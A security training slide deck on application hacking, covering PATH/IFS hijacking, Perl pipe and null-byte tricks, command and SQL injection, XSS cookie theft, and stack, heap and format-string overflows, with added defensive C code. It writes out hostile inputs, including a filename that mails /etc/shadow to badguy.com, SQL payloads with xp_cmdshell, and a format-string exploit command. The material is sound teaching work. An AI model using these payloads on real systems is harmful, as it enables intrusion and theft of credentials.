Page 1
Security Training
III – Application Hacking
Renaud BIDOU
Page 2
• Applications target points

Page 3
Agenda – Part II: Input data

Page 6
INTRO
Functional Components

Page 10
Environment Variables
Page 11
$ENV
• Typical path deviation
  • Set PATH variable to include current directory
  • Write fake program
  • User will run the fake one if not using absolute path
Case Study
# export PATH=.
# ping gotcha
Page 12
$ENV
PATH and IFS
• What is IFS?
  • Defines separators
  • Usually space, tab and carriage return
  • Can be used to bypass PATH protection
  • User will run the fake one if not using absolute path
Case Study
# export PATH=.
# export IFS="P\r\n"
# script.sh gotcha
Page 13
$ENV
Other variables at risk
• LD_PRELOAD
  • Used to load shared libraries
  • Can be used to load trojaned libraries
  • May generate buffer overflows on target applications
• Used to load Java classes
  • Can be abused to load trojaned classes
• TMP
  • Sets the temporary directory
  • Useful for race conditions
Page 14
$ENV
Mitigating the risk
• Global deletion
  • Under Linux, set the **environ pointer to NULL
  • Use the clearenv() function on POSIX systems
  • May leave the system unstable

Page 15
$ENV
Mitigating the risk
• Selective deletion
  • Function unsetenv()
  • POSIX compliant
  • More dangerous, as all dangerous variables have to be unset
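Both strategies from the two slides above, as an added example (hypothetical helpers, not the slides' own code): global deletion with clearenv() followed by restoring a pinned PATH, and selective deletion with unsetenv() over a list of risky variables. The safe PATH value and the list of variables are assumptions.

```c
#define _GNU_SOURCE          /* declares clearenv() on glibc */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical helpers (added example) run before a program execs anything:
 *   - global deletion: clearenv(), then restore the few variables we need;
 *   - selective deletion: unsetenv() for every variable known to be risky.
 * Both end by forcing a PATH that contains absolute entries only. */

static const char *const SAFE_PATH = "/usr/bin:/bin";   /* assumed safe value */

/* Variables from the slides that an attacker controls through the environment
 * (CLASSPATH is the Java one). The list must be complete, which is exactly the
 * weakness of the selective approach. */
static const char *const RISKY_VARS[] = {
    "IFS", "LD_PRELOAD", "LD_LIBRARY_PATH", "CLASSPATH", "TMP", "TMPDIR", NULL
};

/* Returns 1 if PATH is unset or any entry is empty or relative (".", "bin"),
 * 0 if every entry is absolute. */
int path_has_relative_entry(const char *path) {
    if (path == NULL) return 1;
    for (const char *p = path;;) {
        if (*p != '/') return 1;              /* "", "." or "foo" */
        const char *colon = strchr(p, ':');
        if (colon == NULL) return 0;
        p = colon + 1;
    }
}

/* Strategy 1: wipe the whole environment, then restore a known-good PATH. */
int sanitize_env_global(void) {
    if (clearenv() != 0) return -1;
    return setenv("PATH", SAFE_PATH, 1);
}

/* Strategy 2: remove only the risky variables, and still pin PATH. */
int sanitize_env_selective(void) {
    for (const char *const *v = RISKY_VARS; *v != NULL; ++v)
        if (unsetenv(*v) != 0) return -1;
    return setenv("PATH", SAFE_PATH, 1);
}

int main(void) {
    setenv("PATH", ".", 1);                   /* constructed: the slide's hostile setting */
    printf("before: relative entry=%d\n", path_has_relative_entry(getenv("PATH")));
    sanitize_env_selective();
    printf("after:  relative entry=%d PATH=%s\n",
           path_has_relative_entry(getenv("PATH")), getenv("PATH"));
    return 0;
}
```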
Page 16
& Commands
Page 17
FILES
Language Specificities
• The PERL pipe
  • Specific behavior of the PERL open function
  • A script that opens a file whose name is provided by user input
  • User provides “mail hacker@badguy.com < cat /etc/shadow |”
  • Gotcha!
Page 18
FILES
Language Specificities
• The \0
  • Is considered as a character by PERL
  • Is the end of string for C
  • Bypasses some security checks
• Ex: Displaying an HTML page based on user input
  • PERL CGI application takes the input
  • Adds “.html”
  • Sends it to a C program for processing
  • User provides “/etc/passwd\0”
  • CGI script sends “/etc/passwd\0.html” to the C program
  • C program handles “/etc/passwd”
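The receiving side of the CGI-to-C hand-off above, as an added example (hypothetical code, not from the slides): the C program validates the raw byte count it was given rather than what strlen() reports, so an embedded NUL is rejected before the ".html" check can be bypassed. The allow-list of characters and the 255-byte limit are assumptions.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical receiver (added example). The Perl side may forward the bytes
 * "/etc/passwd\0.html"; strlen() stops at the NUL, so the ".html" suffix that
 * was checked upstream is invisible to C. Validate the raw length instead. */

#define PAGE_SUFFIX ".html"

/* Length of the name as the C library would see it (stops at the first NUL). */
size_t c_visible_length(const char *buf, size_t len) {
    const char *nul = memchr(buf, '\0', len);
    return nul ? (size_t)(nul - buf) : len;
}

/* Returns 1 if buf[0..len) is an acceptable page name, 0 otherwise.
 * Explicit allow policy: [A-Za-z0-9_-]+ followed by ".html", no embedded
 * NUL, no '/' or '.' before the suffix (so no path traversal). */
int is_safe_page_name(const char *buf, size_t len) {
    const size_t sfx = strlen(PAGE_SUFFIX);
    if (len <= sfx || len > 255)
        return 0;
    if (c_visible_length(buf, len) != len)        /* embedded NUL: reject */
        return 0;
    if (memcmp(buf + len - sfx, PAGE_SUFFIX, sfx) != 0)
        return 0;
    for (size_t i = 0; i < len - sfx; i++) {
        unsigned char c = (unsigned char)buf[i];
        if (!isalnum(c) && c != '_' && c != '-')
            return 0;
    }
    return 1;
}

int main(void) {
    /* Constructed input: the exact bytes the slide's CGI script would send. */
    static const char evil[] = "/etc/passwd\0.html";   /* 17 bytes of payload */
    size_t received = sizeof evil - 1;
    printf("strlen() sees %zu bytes, %zu were received, safe=%d\n",
           strlen(evil), received, is_safe_page_name(evil, received));
    printf("\"index.html\" safe=%d\n", is_safe_page_name("index.html", 10));
    return 0;
}
```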
Page 19
COMMAND
Command Execution
• ; && and ||
  • Used to chain multiple commands
  • Can be inserted in a user input, followed by a command
  • The script will execute the command
• The HTML page asks for an IP to ping
  • The CGI script will execute
  • If the user provides “10.0.0.1;cat /etc/passwd”

Page 20
COMMAND
• NEVER trust a user
• Filter all inputs
  • Use an explicit authorized policy
    • What is not authorized is forbidden
    • List of authorized input may vary
  • Reject invalid input
    • Some scripts try to correct it instead of rejecting it
Page 21
Injections

Page 22
INJECTION
Basics
• Objective
  • Use input capabilities to have the remote software
    • … display the input
    • … execute the input
    • … transmit the input to a third party application
• Use legitimate channels
  • Hard to detect
  • Few anomalies
Page 23
• The HTML injection
  • Common input channel
    • HTML input field
      • Text field through the GUI
      • Other fields via HTTP proxy/editor
    • Use URL parameters

Page 24
INJECTION
Basics
• HTML Injection usage
  • Mess up the output
  • Inject CSS-like load
  • Have input executed by scripting languages
    • php, asp, perl etc.
    • Classical test with <? phpinfo() ?>
  • Inject malicious data into a database
    • For further execution
  • Links to insecure pages
Page 26
INJECTION
SQL Injection
• Example
  • Injecting an additional SQL command
  • Original SQL request
    SELECT * FROM table where x=$data
  • $data is provided by the user
  • The user provides
    $data = 1; SELECT * FROM secret_table
  • The SQL database will execute
    SELECT * FROM table where x= 1; SELECT * FROM secret_table;

Page 27
    SELECT * FROM table where x=$data AND y=0
    $data = 1; SELECT * FROM secret_table;
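The "what is not authorized is forbidden" policy of Page 20 applied to the two inputs seen so far, the IP given to the ping CGI and the $data value spliced into the SQL request above, as an added example (hypothetical validators, not the slides' own code): each input is parsed as exactly the type the script expects, so a ';' never reaches the shell or the database. The table and column names are the ones in the slide's query.

```c
#include <ctype.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical validators (added example). Instead of trying to strip ';'
 * or '|', the input is parsed strictly and anything else is rejected. */

/* Accepts only a dotted-quad IPv4 literal such as "10.0.0.1". */
int is_ipv4_literal(const char *s) {
    int octets = 0;
    while (*s != '\0') {
        int value = 0, digits = 0;
        if (!isdigit((unsigned char)*s)) return 0;
        while (isdigit((unsigned char)*s)) {
            value = value * 10 + (*s++ - '0');
            if (++digits > 3 || value > 255) return 0;
        }
        octets++;
        if (*s == '.') {                       /* another octet must follow */
            if (octets == 4 || s[1] == '\0') return 0;
            s++;
        } else if (*s != '\0') {
            return 0;                          /* ';', ' ', '|', '&' ... rejected */
        }
    }
    return octets == 4;
}

/* Parses a non-negative decimal id; the whole string must be consumed. */
int parse_id(const char *s, long *out) {
    char *end;
    if (!isdigit((unsigned char)*s)) return 0;     /* no sign, no spaces */
    errno = 0;
    long v = strtol(s, &end, 10);
    if (errno != 0 || *end != '\0') return 0;      /* "1; SELECT ..." stops at ';' */
    *out = v;
    return 1;
}

/* Builds the slide's query only from a validated integer; returns 1 on success,
 * so "1; SELECT * FROM secret_table" can never be spliced into the statement. */
int build_query(const char *data, char *out, size_t outsz) {
    long id;
    if (!parse_id(data, &id)) return 0;
    int n = snprintf(out, outsz, "SELECT * FROM table where x=%ld AND y=0", id);
    return n > 0 && (size_t)n < outsz;
}
```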
Page 30
INJECTION
SQL Injection
• Advanced techniques
  • From a URL http://server/index.asp?id=$data
  • Getting info on SQL structures 1 - Tables
    1 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES
  • The command output is the name of the first table
  • UNION with an integer (1) will generate an error
    Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table1' to a column of data type int
    /index.asp, line 5
  • Next table
    1 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('table1')

Page 31
• Advanced techniques
  • Getting info on SQL structures 2 - Columns
  • The command output is the name of the first column
  • UNION with an integer (1) will generate an error
    Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_id' to a column of data type int
    /index.asp, line 5
Page 32
INJECTION
SQL Injection
• Other possibilities
  • Once the database structure is known
    • Inserting data
      1; UPDATE 'table1' SET password='toto' where login='admin'
  • Leverage the power of the attack
    • With stored procedures
    • With embedded database shell access
      '; exec master xp_cmdshell 'ping 10.10.1.2'

Page 33
INJECTION
Cross Site Scripting
• Basics
  • Technology
    • Originally based on JavaScript
    • Applicable to any client scripting language, including HTML…
  • Have code executed with the user's credentials
  • In order to
    • Transmit user private data, mainly cookies
      • Session cookies are used for authentication
    • Use the user's credentials to perform operations
Page 35
Cross Site Scripting
• Stealing cookies
  1 Own a web server – badguy.com in the example
  2 Have the following code injected by the target user
  3 Get the cookie in the values variable of the cookies.cgi script

Page 36
Cross Site Scripting
• Stealing cookies in hexadecimal
  • To make human detection difficult
  • The same as on the preceding page

Page 37
• Use target credentials
  • Have the following code injected on the target user
  • He will use his rights to change his password
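The mitigation for the HTML and script injections of Pages 23 to 37 is output encoding: everything a user supplied is escaped before it is echoed into a page. This html_escape() is an added example (hypothetical helper, not code from the slides); the reflected sample input is constructed.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical output-encoding helper (added example). Anything that came from
 * a user and is echoed back into an HTML page goes through this function, so an
 * injected "<script>" is rendered as text and never parsed as markup. Returns
 * the number of bytes written (without the terminating NUL), or -1 when the
 * destination buffer is too small. */
int html_escape(const char *in, char *out, size_t outsz) {
    size_t used = 0;
    for (; *in != '\0'; ++in) {
        char single[2] = { *in, '\0' };
        const char *rep;
        switch (*in) {
        case '&':  rep = "&amp;";  break;
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;   /* also safe inside attributes */
        default:   rep = single;   break;
        }
        size_t n = strlen(rep);
        if (used + n + 1 > outsz) return -1;   /* keep room for the NUL */
        memcpy(out + used, rep, n);
        used += n;
    }
    out[used] = '\0';
    return (int)used;
}

int main(void) {
    /* Constructed sample: a search term reflected into the result page. */
    const char *reflected = "<script>alert(1)</script> & \"friends\"";
    char page[256];
    if (html_escape(reflected, page, sizeof page) >= 0)
        printf("<p>You searched for: %s</p>\n", page);
    return 0;
}
```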
Page 38
Internal Parts

Page 39
Reminder

Page 40
REMINDER
Memory organization
• Dynamic variables declared within functions
• Automatic local variables
• argv, argc etc.

Page 41
• Saves CPU operation
• EBP register on x86 architectures
[Figure: memory layout from the highest address to the lowest: Stack, BSS, Data, Text]
Page 42
REMINDER
• Save arguments in the stack ($2, $3)
• Save return address in the stack (ret)
• Save frame pointer – EBP in the stack (sfp)
• Copy ESP in EBP

void fonction(int a, int b);   /* callee whose frame is shown below */

int main(void) {
    fonction(1, 2);
    return 0;
}

push $2
push $3
call fonction

Stack frame, highest address first:
$2
$3
ret (eip)
sfp (ebp)
buf1
buf2
Page 43
Buffer Overflows

Page 44
BOF
• Find a way to change the return address
  • Have it point to another function
    • A shell is a good one…
• If the corrupted process has root privileges…
  • Run by root
  • Or thanks to the suid bit
• ROOTSHELL
Page 45
BOF
Reaching the EIP
• Vulnerable code
• Compiles but generates a segmentation fault upon execution
• You just started to scramble the SFP!
[Figure: buf1 with cells labelled A B C]
Page 46
BOF
Injecting redirection
• Shellcode after the modified EIP
  • Easy to find the new address to point to
  • Architecture independent
  • Makes the environment unstable
  • Dirty
• Shellcode in the buffer
  • Needs a buffer that is large enough
Page 47
• Global schema
  • Filling the buffer
  • NOP padding (0x90 instruction) - N
[Figure: buffer filled with NOP padding (NNNN…) followed by the shellcode (SSSS…) and the overwritten return address]
Page 48
Heap Overflow

Page 49
HEAP
Injecting redirection
• Overflow is used to corrupt a function pointer
• Applied to the vfptr of an adjacent function
[Figure: two adjacent objects, each with a VTABLE PTR and member vars; the overflow replaces the neighbour's _vfptr (used by _destructor) with @fake_vfptr]
Page 50
Format String

Page 51
FORMAT
• Change the return address of a function
  • Have it point to a shellcode
• Use the %x and %n formatting directives
  • %x is used to perform hexadecimal conversion
  • %n stores the number of characters formatted
[Figure: example giving n = 10]
Page 53
FORMAT
%x format
• If values are not specified in the snprintf() arguments, it uses the next byte in the stack!
[Figure: stack as read by the %x directives: len(buffer), argv[1], the bytes \x00\x03\x02\x01, buffer]
Page 54
FORMAT
%n format
• If values are not specified in the snprintf() arguments, it uses the next byte in the stack, to WRITE the result!
# perl -e 'system "./stack \x64\xf6\xff\xbf%.496x%n"'
[Figure: stack with i=1 and ret (eip)]